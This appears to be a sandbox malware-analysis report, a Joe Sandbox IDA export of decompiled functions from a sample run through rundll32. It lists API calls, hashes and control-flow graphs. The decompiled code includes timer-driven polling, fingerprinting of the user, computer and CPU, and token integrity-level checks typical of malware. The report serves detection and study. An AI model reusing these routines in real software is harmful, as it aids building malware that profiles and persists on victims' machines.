                                          					_t97 = E06779DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x677d238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E0677A5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E06776106();
                                          						L22:
                                          						HeapFree( *0x677d238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E06772F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E0677A060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E0677147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E06771600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E0677147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06771768
                                          • wsprintfA.USER32 ref: 067717B8
                                          • wsprintfA.USER32 ref: 067717D5
                                          • wsprintfA.USER32 ref: 06771801
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771813
                                          • wsprintfA.USER32 ref: 06771834
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 06771872
                                          • GetTickCount.KERNEL32 ref: 06771883
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06771897
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 067718B5
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 06774D2C: strcpy.NTDLL ref: 06774D76
                                            • Part of subcall function 06774D2C: lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06774D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                          • StrTrimA.SHLWAPI(00000000,0677C294,?,06C495B0), ref: 067718EC
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 06779DEF: lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                            • Part of subcall function 06779DEF: lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06771919
                                          • lstrcpy.KERNEL32(?,?), ref: 06771921
                                          • lstrcat.KERNEL32(?,?), ref: 0677192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 06771935
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                          • wcstombs.NTDLL ref: 067719C8
                                            • Part of subcall function 0677A060: SysAllocString.OLEAUT32(?), ref: 0677A09B
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 06771A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 06771A15
                                          • HeapFree.KERNEL32(00000000,?,?,06C495B0), ref: 06771A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771A39
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 473e87bd33a833c9381f8b751102ffb74c40c4c4da91bd57d0906f1e915755de
                                          • Instruction ID: cac325807f9eee4e69da1eeaa8dd67e55918ed5454b8e1411f00926db589a6e6
                                          • Opcode Fuzzy Hash: 473e87bd33a833c9381f8b751102ffb74c40c4c4da91bd57d0906f1e915755de
                                          • Instruction Fuzzy Hash: A9910971900209EFDF61DFA4DC88EAE7BBAEF48210F158464FA08E7264DB31D951DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 6779b6f-6779ba1 memset CreateWaitableTimerA 98 6779ba7-6779c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 6779d23-6779d29 GetLastError 97->99 101 6779c06-6779c09 98->101 102 6779c8b-6779c91 98->102 100 6779d2d-6779d37 99->100 103 6779c14 101->103 104 6779c0b call 67768cf 101->104 105 6779c92-6779c96 102->105 109 6779c1e 103->109 110 6779c10-6779c12 104->110 107 6779ca6-6779caa 105->107 108 6779c98-6779ca0 HeapFree 105->108 107->105 111 6779cac-6779cb6 CloseHandle 107->111 108->107 112 6779c22-6779c27 109->112 110->103 110->109 111->100 113 6779c3a-6779c5d call 6779f11 112->113 114 6779c29-6779c30 112->114 117 6779c62-6779c68 113->117 114->113 115 6779c32 114->115 115->113 118 6779c6a-6779c75 117->118 119 6779cb8-6779cbd 117->119 118->112 122 6779c77-6779c87 call 67754ac 118->122 120 6779cbf-6779cc5 119->120 121 6779cdc-6779ce4 119->121 120->102 123 6779cc7-6779cda call 6776106 120->123 124 6779cea-6779d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->124 122->102 123->124 124->112 127 6779d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E06779B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x677d240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L0677B088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x677d26c; // 0x3d0
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x677d24c = 5;
                                          						} else {
                                          							_t68 = E067768CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x677d260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E06779F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E067754AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x677d244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x677d248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E06776106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x677d248);
                                          								L21:
                                          								L0677B088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x677d238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 06779B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 06779B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06779BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 06779BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,06774AC4,?), ref: 06779BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000), ref: 06779CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000,?,?), ref: 06779CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 06779CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 06779D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 06779D10
                                            • Part of subcall function 067768CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06C49388,00000000,?,7519F710,00000000,7519F730), ref: 0677691E
                                            • Part of subcall function 067768CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06C493C0,?,00000000,30314549,00000014,004F0053,06C4937C), ref: 067769BB
                                            • Part of subcall function 067768CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,06779C10), ref: 067769CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000,?,?), ref: 06779D23
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 6e086f06c207aa6e1ff8578858366404097f07f42c612fe7806c983b6443c744
                                          • Instruction ID: 407522aad560063769ab4c1c140a7c9359739ea2de367b7249b6bf55e7f517bc
                                          • Opcode Fuzzy Hash: 6e086f06c207aa6e1ff8578858366404097f07f42c612fe7806c983b6443c744
                                          • Instruction Fuzzy Hash: 6A51ADB1419310AFCBA1EF25DC48DABBBE9EF89724F108A19FAA4D2154D770C504CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E06771A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L0677B082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x677d2a4; // 0x4ca5a8
                                          				_t5 = _t13 + 0x677e836; // 0x6c48dde
                                          				_t6 = _t13 + 0x677e59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L0677AD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x677d2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?,?), ref: 06771A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 06771A70
                                          • _snwprintf.NTDLL ref: 06771A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0677D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 06771AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?), ref: 06771AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 06771ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53), ref: 06771AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?), ref: 06771B03
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 2e84810082474fa6817327a1eb015f6cb853311277e886f6e9ebd1adc78476c6
                                          • Instruction ID: 01d09e4d91af4f88673091fd89ac76e96823680b026179c3c408e6ca9749cd44
                                          • Opcode Fuzzy Hash: 2e84810082474fa6817327a1eb015f6cb853311277e886f6e9ebd1adc78476c6
                                          • Instruction Fuzzy Hash: 6621F3B2600204BFDB62EF68DD45F9D77AAAF48710F258121F705EB290E770DA05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 67793d5-67793e9 140 67793f3-6779405 call 6776f89 139->140 141 67793eb-67793f0 139->141 144 6779407-6779417 GetUserNameW 140->144 145 6779459-6779466 140->145 141->140 146 6779468-677947f GetComputerNameW 144->146 147 6779419-6779429 RtlAllocateHeap 144->147 145->146 148 6779481-6779492 RtlAllocateHeap 146->148 149 67794bd-67794e1 146->149 147->146 150 677942b-6779438 GetUserNameW 147->150 148->149 151 6779494-677949d GetComputerNameW 148->151 152 677943a-6779446 call 6777cf7 150->152 153 6779448-6779457 HeapFree 150->153 154 677949f-67794ab call 6777cf7 151->154 155 67794ae-67794b7 HeapFree 151->155 152->153 153->146 154->155 155->149
                                          C-Code - Quality: 96%
                                          			E067793D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x677d270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E06776F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x677d2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x677d238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E06777CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x677d238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x677d238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E06777CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x677d238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}




















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0677940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06779423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 06779430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06779451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 06779478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0677948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 06779499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067794B7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 9cade3999f5154c2f982ac01a594c853d98ba6b99e284914e39fb42f7a99b6a3
                                          • Instruction ID: e9debc2b54d2fda3843d464b9c8bdcd49080d02d22ae3fe784c3aa98f1127ad2
                                          • Opcode Fuzzy Hash: 9cade3999f5154c2f982ac01a594c853d98ba6b99e284914e39fb42f7a99b6a3
                                          • Instruction Fuzzy Hash: 12313CB1A00205EFDB61DFA9DC81A6FB7FAFF48200F518469E614D7214DB30EA01DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E067753E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x677d25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E067758BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E0677147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}










                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 06775415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 06775435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 06775445
                                          • CloseHandle.KERNEL32(00000000), ref: 06775495
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 06775468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 06775470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 06775480
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 8cd2553d70760a2e9830c6eb2afa413e7317e821a19541fd34cff2b8c9133174
                                          • Instruction ID: f4e7e2931b78eadd04a9b91a70e11c817752a97c31aa795ff511d729629ffb8b
                                          • Opcode Fuzzy Hash: 8cd2553d70760a2e9830c6eb2afa413e7317e821a19541fd34cff2b8c9133174
                                          • Instruction Fuzzy Hash: D8213975D00218FFEF119FA4DC44EBEBBB9EF49304F0080A5E610A6261CB719A15EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 6777c75-6777c88 187 6777c8f-6777c93 StrChrA 186->187 188 6777c95-6777ca6 call 67758be 187->188 189 6777c8a-6777c8e 187->189 192 6777ceb 188->192 193 6777ca8-6777cb4 StrTrimA 188->193 189->187 195 6777ced-6777cf4 192->195 194 6777cb6-6777cbf StrChrA 193->194 196 6777cd1-6777cdd 194->196 197 6777cc1-6777ccb StrTrimA 194->197 196->194 198 6777cdf-6777ce9 196->198 197->196 198->195
                                          C-Code - Quality: 54%
                                          			E06777C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E067758BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x677c28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x677c28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}











                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,06C495AC,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?), ref: 06777C8F
                                          • StrTrimA.KERNELBASE(?,0677C28C,00000002,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53), ref: 06777CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53,?), ref: 06777CB9
                                          • StrTrimA.SHLWAPI(00000001,0677C28C,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53,?), ref: 06777CCB
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 53d4f5e2fc9dfcfb00a5587835e748557746c499b47d300be3dcd1c68a2250e6
                                          • Instruction ID: dfe9b41c5ce955cd5094cb2472ebfa42d127d7352b4dc098c1ed423e7869c485
                                          • Opcode Fuzzy Hash: 53d4f5e2fc9dfcfb00a5587835e748557746c499b47d300be3dcd1c68a2250e6
                                          • Instruction Fuzzy Hash: 0801D4B1A053256FD6759F698C48F3BBFDCEF8AAA1F124628F941C7241DB60C80182F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
